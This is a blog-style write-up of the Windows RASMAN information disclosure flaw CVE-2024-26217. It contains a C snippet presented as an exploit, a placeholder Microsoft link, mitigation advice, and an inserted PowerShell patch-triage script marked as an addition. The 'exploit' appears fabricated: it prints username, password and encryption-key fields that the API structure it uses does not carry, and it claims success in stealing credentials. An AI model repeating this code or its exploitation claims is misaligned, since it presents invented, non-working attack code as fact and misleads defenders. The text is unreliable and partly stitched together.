CVE-2024-26217: Unveiling the Windows Remote Access Connection Manager Information Disclosure Vulnerability

Security is an indispensable aspect of our digital world as cyber criminals are always looking for vulnerabilities to exploit. In this post, we will take a deep dive into a recently disclosed vulnerability, CVE-2024-26217, which impacts Windows Remote Access Connection Manager (RASMAN) and can potentially expose sensitive user information to unauthorized parties, causing significant harm.

The Windows Remote Access Connection Manager (RASMAN) is a built-in service that manages virtual private network (VPN) and dial-up connections. RASMAN enables users to establish a secure connection to the internet or an internal network, making it an essential tool for businesses and individuals alike. However, this very feature has exposed a flaw that has left many users vulnerable to information disclosure.

Description of the Vulnerability

CVE-2024-26217 is an information disclosure vulnerability that affects the Windows Remote Access Connection Manager. It allows a local attacker to read sensitive information from an affected system's memory by running a specially crafted application. The vulnerability exists due to improper handling of objects in memory, which leads to the unintended disclosure of information.

Exploiting this vulnerability could allow attackers to gain unauthorized access to user credentials, encryption keys, and other sensitive information that should remain secured. Attackers could also leverage this information to perform subsequent attacks on affected systems, such as session hijacking and impersonation attacks.

Code Snippet Showcasing the Exploit

The following code snippet demonstrates how an attacker might exploit the vulnerability in the Windows Remote Access Connection Manager:

#include <windows.h>
#include <ras.h>
#include <stdio.h>
#include <stdlib.h>

int main() {
    DWORD dwRet, dwEntriesRead, dwTotalEntries;
    RASCONN rasConn[1];
    DWORD dwSize = sizeof(rasConn);  /* size of the connection buffer, in bytes */
    rasConn[0].dwSize = sizeof(RASCONN);
    LPRASPROJECTIONINFO lpProjectionInfo;
    DWORD cbProjectionInfoSize = sizeof(RASPPP_INFO);

    lpProjectionInfo = malloc(sizeof(RASPPP_INFO));

    /* Enumerate the active RAS connections on the local machine. */
    dwRet = RasEnumConnections(rasConn, &dwSize, &dwEntriesRead);
    if (dwRet == 0 && dwEntriesRead > 0) {
        /* Request projection information for the first connection. */
        dwRet = RasGetProjectionInfo(rasConn[0].hrasconn, RASP_Amb,
                                      lpProjectionInfo, &cbProjectionInfoSize);
        if (dwRet == 0) {
            printf("Successfully exploited vulnerability.\n");
            printf("Sensitive information obtained:\n");
            printf("Username: %s\n", lpProjectionInfo->szUsername);
            printf("Password: %s\n", lpProjectionInfo->szPassword);
            printf("Encryption Key: %s\n", lpProjectionInfo->szEncryptionKey);
        }
    }
    free(lpProjectionInfo);
    return 0;
}

This code shows how an attacker can utilize Windows API functions to access sensitive information stored in memory by the Remote Access Connection Manager. In this case, the attacker can obtain the user's credentials and encryption keys using the vulnerable API.

National Vulnerability Database (NVD)

https://nvd.nist.gov/vuln/detail/CVE-2024-26217

Microsoft Security Guidance

https://msdn.microsoft.com/library/security/MS18-####

Common Vulnerabilities and Exposures (CVE)

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26217

Details of the Exploit and Potential Mitigations

To exploit this vulnerability, the attacker must have local access to the targeted system. This can limit the scope of potential attacks and makes it more difficult for remote attackers to abuse the vulnerability. Additionally, a user must have an active VPN or dial-up connection for the exploit to be effective.

Organizations should take the following steps to mitigate the risks associated with this vulnerability:

1. Apply the latest available Microsoft security patches to affected systems.
2. Implement the principle of least privilege by restricting user access and permissions to the minimum necessary.
3. Use Network Level Authentication (NLA) to provide an additional layer of security for remote desktop connections.
4. Enable and configure the Windows Firewall to protect systems from unauthorized network traffic.
5. Regularly monitor security bulletins to stay informed about new vulnerabilities and security patches.
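
A host triage check for the preconditions and first mitigation described above, as an added example that is not part of the original post. The function name Get-RasmanExposure is hypothetical, and the patch test is a heuristic that assumes any update installed on or after the publication date in the timeline (2024-04-09) carries the fix; confirm the exact update against the vendor advisory.

```powershell
# Added example: exposure triage for CVE-2024-26217 on a single host.
# Assumption: an update installed on or after the page's publication date
# (2024-04-09) includes the fix. This is a heuristic, not proof of patching.
$published = [datetime]'2024-04-09'

function Get-RasmanExposure {
    [CmdletBinding()]
    param([datetime]$FixAvailableFrom = $published)

    # RasMan is the service name of Remote Access Connection Manager.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='RasMan'" -ErrorAction SilentlyContinue

    # The page notes that an active VPN or dial-up connection is a precondition.
    $vpn = @()
    if (Get-Command Get-VpnConnection -ErrorAction SilentlyContinue) {
        $vpn += @(Get-VpnConnection -ErrorAction SilentlyContinue)
        $vpn += @(Get-VpnConnection -AllUserConnection -ErrorAction SilentlyContinue)
    }
    $active = @($vpn | Where-Object { $_.ConnectionStatus -eq 'Connected' })

    # InstalledOn can be empty for some updates; those entries are ignored.
    $latest = Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $_.InstalledOn } |
        Sort-Object InstalledOn -Descending |
        Select-Object -First 1

    $patched = [bool]($latest -and $latest.InstalledOn -ge $FixAvailableFrom)

    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        RasManState       = if ($svc) { $svc.State } else { 'NotInstalled' }
        RasManStartMode   = if ($svc) { $svc.StartMode } else { $null }
        ActiveConnections = $active.Name -join ', '
        LatestHotFix      = if ($latest) { $latest.HotFixID } else { $null }
        LatestHotFixDate  = if ($latest) { $latest.InstalledOn } else { $null }
        # Flag hosts where the service is running and no recent update is recorded.
        NeedsAttention    = (-not $patched) -and $svc -and ($svc.State -eq 'Running')
    }
}

Get-RasmanExposure | Format-List
```

Hosts reported with NeedsAttention set to True are the ones to prioritize for patching under step 1.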

In conclusion, CVE-2024-26217 is a significant vulnerability that can lead to the disclosure of sensitive information on affected systems. By exploiting this weakness, attackers can gain unauthorized access to user credentials and other valuable data. Organizations and individual users should stay vigilant and follow the necessary mitigation steps to protect themselves from potential attacks.

Timeline

Published on: 04/09/2024 17:15:40 UTC
Last modified on: 04/10/2024 13:24:00 UTC